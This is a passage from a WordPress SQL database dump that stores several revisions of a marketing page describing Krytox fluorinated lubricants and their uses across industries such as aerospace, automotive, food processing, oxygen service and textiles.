<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 18:50:47', '2016-09-28 18:50:47', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2116, 2, '2016-09-28 19:21:26', '2016-09-28 19:21:26', '&nbsp;\r\n\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong><Aerospace, Aviation, and National Defense="aerospace"></strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:21:26', '2016-09-28 19:21:26', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2117, 2, '2016-09-28 19:24:12', '2016-09-28 19:24:12', '&nbsp;\r\n\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Aerospace, Aviation, and National Defense="aerospace"</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from 